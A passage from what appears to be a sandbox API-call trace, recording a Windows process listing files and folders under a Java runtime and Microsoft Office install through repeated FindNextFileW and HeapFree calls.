lpFindFileData=0x348fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa235ac5b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Java", cAlternateFileName="")) returned 1 [0054.748] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0054.749] FindNextFileW (in: hFindFile=0x4260548, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x0, dwReserved1=0x0, cFileName="dt_shmem.dll", cAlternateFileName="")) returned 1 [0054.753] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0054.753] FindNextFileW (in: hFindFile=0x4260548, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="policytool.exe", cAlternateFileName="POLICY~1.EXE")) returned 1 [0054.755] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0054.755] FindNextFileW (in: hFindFile=0x4260548, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="servertool.exe", cAlternateFileName="SERVER~1.EXE")) returned 1 [0054.755] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0054.755] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcac, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0055.362] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0055.384] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="applet", cAlternateFileName="")) returned 1 [0055.384] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0055.384] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x562, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendars.properties", cAlternateFileName="CALEND~1.PRO")) returned 1 [0055.385] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0055.385] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-types.properties", cAlternateFileName="CONTEN~1.PRO")) returned 1 [0055.595] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0055.595] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ed9405, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8ed9405, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa900a6f7, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ce7de, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploy.jar", cAlternateFileName="")) returned 1 [0055.632] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0055.632] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="flavormap.properties", cAlternateFileName="FLAVOR~1.PRO")) returned 1 [0055.841] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0055.841] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x368a, dwReserved0=0x0, dwReserved1=0x0, cFileName="hijrah-config-umalqura.properties", cAlternateFileName="HIJRAH~1.PRO")) returned 1 [0056.027] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4291078 | out: hHeap=0x5d0000) returned 1 [0056.027] FindNextFileW (in: hFindFile=0x42601c8, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cursors", cAlternateFileName="")) returned 0 [0056.027] FindClose (in: hFindFile=0x42601c8 | out: hFindFile=0x42601c8) returned 1 [0056.027] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0056.027] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx.properties", cAlternateFileName="JAVAFX~1.PRO")) returned 1 [0056.030] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0056.030] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x88dc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfr.jar", cAlternateFileName="")) returned 1 [0056.049] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4271068 | out: hHeap=0x5d0000) returned 1 [0056.049] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="management-agent.jar", cAlternateFileName="MANAGE~1.JAR")) returned 1 [0056.339] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0056.339] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="sound.properties", cAlternateFileName="SOUND~1.PRO")) returned 1 [0056.339] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4261060 | out: hHeap=0x5d0000) returned 1 [0056.339] FindNextFileW (in: hFindFile=0x4260648, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0056.339] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43010b0 | out: hHeap=0x5d0000) returned 1 [0056.342] FindNextFileW (in: hFindFile=0x4260088, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre1.8.0_144", cAlternateFileName="JRE18~1.0_1")) returned 0 [0056.342] FindClose (in: hFindFile=0x4260088 | out: hFindFile=0x4260088) returned 1 [0056.342] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f10a8 | out: hHeap=0x5d0000) returned 1 [0056.343] FindNextFileW (in: hFindFile=0x4260108, lpFindFileData=0x348fa7c | out: lpFindFileData=0x348fa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9dfb986, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf9dfb986, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Microsoft Office", cAlternateFileName="MICROS~2")) returned 1 [0056.346] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0056.346] FindNextFileW (in: hFindFile=0x4260208, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf982bd9c, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xf982bd9c, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManifests", cAlternateFileName="PACKAG~1")) returned 1 [0056.353] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4281070 | out: hHeap=0x5d0000) returned 1 [0056.353] FindNextFileW (in: hFindFile=0x4260208, lpFindFileData=0x348f800 | out: lpFindFileData=0x348f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0056.356] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0056.356] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="CLIPART", cAlternateFileName="")) returned 1 [0056.747] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f10a8 | out: hHeap=0x5d0000) returned 1 [0056.747] FindNextFileW (in: hFindFile=0x4260248, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0056.754] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43210c0 | out: hHeap=0x5d0000) returned 1 [0056.754] FindNextFileW (in: hFindFile=0x4260548, lpFindFileData=0x348f08c | out: lpFindFileData=0x348f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Backgrounds", cAlternateFileName="BACKGR~1")) returned 0 [0056.754] FindClose (in: hFindFile=0x4260548 | out: hFindFile=0x4260548) returned 1 [0056.754] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42f10a8 | out: hHeap=0x5d0000) returned 1 [0056.754] FindNextFileW (in: hFindFile=0x4260248, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 0 [0056.754] FindClose (in: hFindFile=0x4260248 | out: hFindFile=0x4260248) returned 1 [0056.754] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e10a0 | out: hHeap=0x5d0000) returned 1 [0056.756] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Document Themes 16", cAlternateFileName="DOCUME~1")) returned 1 [0060.500] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0060.500] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Theme Effects", cAlternateFileName="THEMEE~1")) returned 1 [0060.502] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0060.502] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Theme Fonts", cAlternateFileName="THEMEF~1")) returned 1 [0060.504] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x42e1008 | out: hHeap=0x5d0000) returned 1 [0060.504] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc7c1, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Wisp.thmx", cAlternateFileName="WISP~1.THM")) returned 1 [0060.504] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43210c0 | out: hHeap=0x5d0000) returned 1 [0060.504] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114f5747, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114f5747, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Flattener", cAlternateFileName="FLATTE~1")) returned 1 [0060.507] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d10e0 | out: hHeap=0x5d0000) returned 1 [0060.507] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fre", cAlternateFileName="")) returned 1 [0060.508] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d10e0 | out: hHeap=0x5d0000) returned 1 [0060.508] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b2abe77, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b2abe77, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0060.511] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d10e0 | out: hHeap=0x5d0000) returned 1 [0060.511] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe2687c83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee308135, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xee308135, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Licenses16", cAlternateFileName="LICENS~1")) returned 1 [0061.187] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43d10e0 | out: hHeap=0x5d0000) returned 1 [0061.190] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xee45f66d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x983c2c8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="loc", cAlternateFileName="")) returned 1 [0061.190] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4331018 | out: hHeap=0x5d0000) returned 1 [0061.190] FindNextFileW (in: hFindFile=0x4260808, lpFindFileData=0x348f584 | out: lpFindFileData=0x348f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="mcxml", cAlternateFileName="")) returned 1 [0061.193] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4341020 | out: hHeap=0x5d0000) returned 1 [0061.193] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dfc61, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99dfc61, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99dfc61, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="es-es", cAlternateFileName="")) returned 1 [0061.193] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4341020 | out: hHeap=0x5d0000) returned 1 [0061.193] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99473dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x99473dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x99473dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="fr-fr", cAlternateFileName="")) returned 1 [0061.193] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4341020 | out: hHeap=0x5d0000) returned 1 [0061.193] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b9607ff, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="x-none", cAlternateFileName="")) returned 1 [0061.195] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4341020 | out: hHeap=0x5d0000) returned 1 [0061.195] FindNextFileW (in: hFindFile=0x4260708, lpFindFileData=0x348f308 | out: lpFindFileData=0x348f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1164cbcb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b9607ff, 